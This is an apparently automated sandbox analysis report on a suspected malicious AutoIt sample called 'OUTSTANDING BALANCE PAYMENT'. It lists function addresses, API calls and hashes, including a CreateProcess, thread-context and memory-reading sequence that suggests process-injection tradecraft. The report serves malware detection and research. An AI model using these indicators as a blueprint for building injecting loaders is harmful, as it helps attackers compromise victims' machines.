                                                                  control_flow_graph 1267 1227bb8-1227ccd call 1225808 call 1227aa8 CreateFileW 1274 1227cd4-1227ce4 1267->1274 1275 1227ccf 1267->1275 1278 1227ce6 1274->1278 1279 1227ceb-1227d05 VirtualAlloc 1274->1279 1276 1227d84-1227d89 1275->1276 1278->1276 1280 1227d07 1279->1280 1281 1227d09-1227d20 ReadFile 1279->1281 1280->1276 1282 1227d22 1281->1282 1283 1227d24-1227d5e call 1227ae8 call 1226aa8 1281->1283 1282->1276 1288 1227d60-1227d75 call 1227b38 1283->1288 1289 1227d7a-1227d82 ExitProcess 1283->1289 1288->1289 1289->1276
                                                                  APIs
                                                                    • Part of subcall function 01227AA8: Sleep.KERNELBASE(000001F4), ref: 01227AB9
                                                                  • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01227CC3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2147125259.0000000001225000.00000040.00000020.00020000.00000000.sdmp, Offset: 01225000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1225000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFileSleep
                                                                  • String ID: 6WCOTN938O4J1R3
                                                                  • API String ID: 2694422964-792878379
                                                                  • Opcode ID: 04c100fcaf0477a5ff3ecec8c3cb448a3dd640812fc232ae9de1d39a811513e8
                                                                  • Instruction ID: 98890cb02ae996a14f6af44822124b70e0189601b03ca0879fe540ecf378112e
                                                                  • Opcode Fuzzy Hash: 04c100fcaf0477a5ff3ecec8c3cb448a3dd640812fc232ae9de1d39a811513e8
                                                                  • Instruction Fuzzy Hash: 07517331D14259EBEF11DBA4C815BFEBBB4AF55300F004199E608BB2C0D7B91B45CB65
                                                                  Function 00284A30 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 138COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                    • Part of subcall function 00285374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00341148,?,002861FF,?,00000000,00000001,00000000), ref: 00285392
                                                                    • Part of subcall function 002849FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00284A1D
                                                                  • _wcscat.LIBCMT ref: 002F2D80
                                                                  • _wcscat.LIBCMT ref: 002F2DB5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: _wcscat$FileModuleNameOpen
                                                                  • String ID: 8!4$\$\Include\
                                                                  • API String ID: 3592542968-2927916707
                                                                  • Opcode ID: 186ab09a072b2d7af8a634cb5cdee30281e2200caec9497aaa2f4781ce9704ab
                                                                  • Instruction ID: 097dc13d9115bdbc6297eceeafcd56fd4cf22017f4a88867b4ea33ef31f944c4
                                                                  • Opcode Fuzzy Hash: 186ab09a072b2d7af8a634cb5cdee30281e2200caec9497aaa2f4781ce9704ab
                                                                  • Instruction Fuzzy Hash: B151717D4253408FC316EF55D9818ABB3F8BE5A304F80492EF644A72A1EF70A558CF62
                                                                  Function 002851AF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 0028522F
                                                                  • _wcscpy.LIBCMT ref: 00285283
                                                                  • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00285293
                                                                  • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 002F3CB0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: IconLoadNotifyShell_String_memset_wcscpy
                                                                  • String ID: Line:
                                                                  • API String ID: 1053898822-1585850449
                                                                  • Opcode ID: 178f30325c567bd92d3678652ee538215a3c80d09293dc4c2ce87b4f4a00a3a0
                                                                  • Instruction ID: 403abafdbb53f1b88fce1f9500e26db360b5374cf7982eb0e9f08340faa137b2
                                                                  • Opcode Fuzzy Hash: 178f30325c567bd92d3678652ee538215a3c80d09293dc4c2ce87b4f4a00a3a0
                                                                  • Instruction Fuzzy Hash: D131D039029B516FD322FB60DC46FDAB7DCAF45310F00451AF589960D1EF70A6A8CB92
                                                                  Function 00284139 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 258COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 002841A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,002839FE,?,00000001), ref: 002841DB
                                                                  • _free.LIBCMT ref: 002F36B7
                                                                  • _free.LIBCMT ref: 002F36FE
                                                                    • Part of subcall function 0028C833: __wsplitpath.LIBCMT ref: 0028C93E
                                                                    • Part of subcall function 0028C833: _wcscpy.LIBCMT ref: 0028C953
                                                                    • Part of subcall function 0028C833: _wcscat.LIBCMT ref: 0028C968
                                                                    • Part of subcall function 0028C833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0028C978
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
                                                                  • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                  • API String ID: 805182592-1757145024
                                                                  • Opcode ID: 1f42515a9c3d63638b796fb978572b81ff9776fed3123b5786092610ce718227
                                                                  • Instruction ID: 6b7604c110d1a81485fd8c3b15b21641459623dfe4a8e1da61f79533877a4056
                                                                  • Opcode Fuzzy Hash: 1f42515a9c3d63638b796fb978572b81ff9776fed3123b5786092610ce718227
                                                                  • Instruction Fuzzy Hash: DA917D71920219AFCF04EFA4CC919FEB7B4BF19350F50402AF916AB291DB709A64CF60
                                                                  Function 002840E5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 002F3725
                                                                  • GetOpenFileNameW.COMDLG32 ref: 002F376F
                                                                    • Part of subcall function 0028660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002853B1,?,?,002861FF,?,00000000,00000001,00000000), ref: 0028662F
                                                                    • Part of subcall function 002840A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 002840C6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Name$Path$FileFullLongOpen_memset
                                                                  • String ID: X$t33
                                                                  • API String ID: 3777226403-4182937556
                                                                  • Opcode ID: b0d3d28fbe1dca64048ab5630fa5c3c0eb96c8488be907735f1e5b765a816a4c
                                                                  • Instruction ID: c40bccd9649f753c5dd7ea9682faf772d54a65bec1e07e3e1f71bf0d3e1db7b9
                                                                  • Opcode Fuzzy Hash: b0d3d28fbe1dca64048ab5630fa5c3c0eb96c8488be907735f1e5b765a816a4c
                                                                  • Instruction Fuzzy Hash: 3421A875A211989FCF01FFD4C8457EEBBFC9F49304F00805AE505A7281DBB85A998F65
                                                                  Function 002A34AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __getstream.LIBCMT ref: 002A34FE
                                                                    • Part of subcall function 002A7C0E: __getptd_noexit.LIBCMT ref: 002A7C0E
                                                                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 002A3539
                                                                  • __wopenfile.LIBCMT ref: 002A3549
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                                                  • String ID: <G
                                                                  • API String ID: 1820251861-2138716496
                                                                  • Opcode ID: d01aa2fd8da05824a7cd0b47eadf4d9463db510d21137cc4999f2e2ac78868cc
                                                                  • Instruction ID: 84b08f83bca8e4e1234622f9f91f11c50d2a3108e4759f606e18c71d60c84c75
                                                                  • Opcode Fuzzy Hash: d01aa2fd8da05824a7cd0b47eadf4d9463db510d21137cc4999f2e2ac78868cc
                                                                  • Instruction Fuzzy Hash: 8B11B270A203069BDB12FF749C4266E76A5AF4B360B158825F415D7181EF74CA319BA1
                                                                  Function 0029D298 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,0029D28B,SwapMouseButtons,00000004,?), ref: 0029D2BC
                                                                  • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,0029D28B,SwapMouseButtons,00000004,?,?,?,?,0029C865), ref: 0029D2DD
                                                                  • RegCloseKey.KERNELBASE(00000000,?,?,0029D28B,SwapMouseButtons,00000004,?,?,?,?,0029C865), ref: 0029D2FF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: CloseOpenQueryValue
                                                                  • String ID: Control Panel\Mouse
                                                                  • API String ID: 3677997916-824357125
                                                                  • Opcode ID: b8952f30ec51d214f5a522a0cf6a038fa1e1b901fff4d4c9dea2deaf5dec1906
                                                                  • Instruction ID: 2d8af8966e2ddcc9586ca5824e3311f3336223ac0dd5210976988df735cf18c4
                                                                  • Opcode Fuzzy Hash: b8952f30ec51d214f5a522a0cf6a038fa1e1b901fff4d4c9dea2deaf5dec1906
                                                                  • Instruction Fuzzy Hash: 70117975A21209BFDF218FA8CC84EAF7BBCEF04740F004469E805D7110E771AE50AB64
                                                                  Function 01226AA8 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateProcessW.KERNELBASE(?,00000000), ref: 01227263
                                                                  • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 012272F9
                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0122731B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2147125259.0000000001225000.00000040.00000020.00020000.00000000.sdmp, Offset: 01225000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1225000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                  • String ID:
                                                                  • API String ID: 2438371351-0
                                                                  • Opcode ID: a5f8eca76df1c4d60a387bf050efe929c827b8bdc82418feca4108ede207e1c1
                                                                  • Instruction ID: 18ad6df7c0ed5e49eb90057a85cee7d2a12be9dfc3a3fba0411ac011a7e8d8ef
                                                                  • Opcode Fuzzy Hash: a5f8eca76df1c4d60a387bf050efe929c827b8bdc82418feca4108ede207e1c1
                                                                  • Instruction Fuzzy Hash: 20621F30A24259DBEB24CF64C851BEEB771EF68300F1091A9D60DEB390E7759E81CB59
                                                                  Function 0029EB83 Relevance: 6.1, APIs: 4, Instructions: 65timewindowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 0029EBB2
                                                                    • Part of subcall function 002851AF: _memset.LIBCMT ref: 0028522F
                                                                    • Part of subcall function 002851AF: _wcscpy.LIBCMT ref: 00285283
                                                                    • Part of subcall function 002851AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00285293
                                                                  • KillTimer.USER32(?,00000001,?,?), ref: 0029EC07
                                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0029EC16
                                                                  • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 002F3C88
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                  • String ID:
                                                                  • API String ID: 1378193009-0
                                                                  • Opcode ID: 0b4a246795eb3d47321e112f0527a91bf6e222b54584af8f6f53ecfc711f3ad7
                                                                  • Instruction ID: 41f1ba46353c297174d8a4c24caf9c9bd42580e9ceea926c7543c55af6bd1ca3
                                                                  • Opcode Fuzzy Hash: 0b4a246795eb3d47321e112f0527a91bf6e222b54584af8f6f53ecfc711f3ad7
                                                                  • Instruction Fuzzy Hash: 2921D7745147989FEB33DF28C859BE7FFEC9B01308F04049EE68E56282C7B46A948B51
                                                                  Function 002CC71A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetTempPathW.KERNEL32(00000104,?), ref: 002CC72F
                                                                  • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 002CC746
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Temp$FileNamePath
                                                                  • String ID: aut
                                                                  • API String ID: 3285503233-3010740371
                                                                  • Opcode ID: 93456c3a48b682903c234f0882f65ab4d470e30d213ae06cbfd8b6587aaec0c5
                                                                  • Instruction ID: 7537f3a11bf5b6f8661aa211008da0d39ba6790d435c31fd04a79e3402d5bb9c
                                                                  • Opcode Fuzzy Hash: 93456c3a48b682903c234f0882f65ab4d470e30d213ae06cbfd8b6587aaec0c5
                                                                  • Instruction Fuzzy Hash: EBD05E7150030EABDB11AB90DC4EFCA77AC9700704F0005A1B650A50B1DBB4E6998B58
                                                                  Function 002DF8AE Relevance: 4.9, APIs: 3, Instructions: 385COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 632bd1729051d8372a0d95ee4bc4ab9126c5789590f68a385c036fc81561aeb1
                                                                  • Instruction ID: 7169346a8f8a0d051b4567cd8af3788436e21c8564d3c8f7c25d31ce6a0f71c2
                                                                  • Opcode Fuzzy Hash: 632bd1729051d8372a0d95ee4bc4ab9126c5789590f68a385c036fc81561aeb1
                                                                  • Instruction Fuzzy Hash: 86F179716143019FCB10DF24C981B5AB7E5BF88318F14892EF99A9B392D770E955CF82
                                                                  Function 00284FFC Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 00285022
                                                                  • Shell_NotifyIconW.SHELL32(00000000,?), ref: 002850CB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: IconNotifyShell__memset
                                                                  • String ID:
                                                                  • API String ID: 928536360-0
                                                                  • Opcode ID: c400d7f85d2a0ff8dc34731a97037e7571309d97f24c8983b685437056832807
                                                                  • Instruction ID: d0b3129eba2a7d0dc8824acbbe7c5c3c625b7bc99af0ff4d39eafb1b993bec49
                                                                  • Opcode Fuzzy Hash: c400d7f85d2a0ff8dc34731a97037e7571309d97f24c8983b685437056832807
                                                                  • Instruction Fuzzy Hash: AA31C5B4515B11CFC321EF64D845697BBE8FF49304F00092EF59A87281E7716994CB92
                                                                  Function 002A395C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __FF_MSGBANNER.LIBCMT ref: 002A3973
                                                                    • Part of subcall function 002A81C2: __NMSG_WRITE.LIBCMT ref: 002A81E9
                                                                    • Part of subcall function 002A81C2: __NMSG_WRITE.LIBCMT ref: 002A81F3
                                                                  • __NMSG_WRITE.LIBCMT ref: 002A397A
                                                                    • Part of subcall function 002A821F: GetModuleFileNameW.KERNEL32(00000000,00340312,00000104,00000000,00000001,00000000), ref: 002A82B1
                                                                    • Part of subcall function 002A821F: ___crtMessageBoxW.LIBCMT ref: 002A835F
                                                                    • Part of subcall function 002A1145: ___crtCorExitProcess.LIBCMT ref: 002A114B
                                                                    • Part of subcall function 002A1145: ExitProcess.KERNEL32 ref: 002A1154
                                                                    • Part of subcall function 002A7C0E: __getptd_noexit.LIBCMT ref: 002A7C0E
                                                                  • RtlAllocateHeap.NTDLL(011E0000,00000000,00000001,00000001,00000000,?,?,0029F507,?,0000000E), ref: 002A399F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                  • String ID:
                                                                  • API String ID: 1372826849-0
                                                                  • Opcode ID: dc4a51572c5aa99244ae6bda8c6aad03f2690c62200c49169e84f99590dfa1a3
                                                                  • Instruction ID: 85784c086c0c72b1fc438f1a0ac76283eeec8cb4948eac6bd3c0834d15762b52
                                                                  • Opcode Fuzzy Hash: dc4a51572c5aa99244ae6bda8c6aad03f2690c62200c49169e84f99590dfa1a3
                                                                  • Instruction Fuzzy Hash: 660196353753039BE6167B74EC52B6B33489B83760F210026F5059A191DFF09D204A64
                                                                  Function 002CC6D9 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,002CC385,?,?,?,?,?,00000004), ref: 002CC6F2
                                                                  • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,002CC385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 002CC708
                                                                  • CloseHandle.KERNEL32(00000000,?,002CC385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 002CC70F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: File$CloseCreateHandleTime
                                                                  • String ID:
                                                                  • API String ID: 3397143404-0
                                                                  • Opcode ID: 1e3c233609a5142dea4e0113716ce9a2d48aa0b7b26f8229c5c596572bddf73e
                                                                  • Instruction ID: bad919a78c430a0e53aff768b513d0e25be92aa8ea66be0307909cd32688a792
                                                                  • Opcode Fuzzy Hash: 1e3c233609a5142dea4e0113716ce9a2d48aa0b7b26f8229c5c596572bddf73e
                                                                  • Instruction Fuzzy Hash: 72E08632141214B7D7221F94AC1AFCA7F5CEB05760F104211FB54690E097B125218798
                                                                  Function 002CBB64 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _free.LIBCMT ref: 002CBB72
                                                                    • Part of subcall function 002A1C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,002A7A85), ref: 002A1CB1
                                                                    • Part of subcall function 002A1C9D: GetLastError.KERNEL32(00000000,?,002A7A85), ref: 002A1CC3
                                                                  • _free.LIBCMT ref: 002CBB83
                                                                  • _free.LIBCMT ref: 002CBB95
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                  • String ID:
                                                                  • API String ID: 776569668-0
                                                                  • Opcode ID: 20f76424029b3f4f106c4d8a086868d24a1af312dab904e69dcb584714f23b8e
                                                                  • Instruction ID: 5f662cd75e7a8c189539484730abd5f324ae23da96ba6985aa882dea20fea658
                                                                  • Opcode Fuzzy Hash: 20f76424029b3f4f106c4d8a086868d24a1af312dab904e69dcb584714f23b8e
                                                                  • Instruction Fuzzy Hash: E0E0C2A162070243CA2069786E45FB313CC0F05331F04090EB819E314ACF20EC7088B4
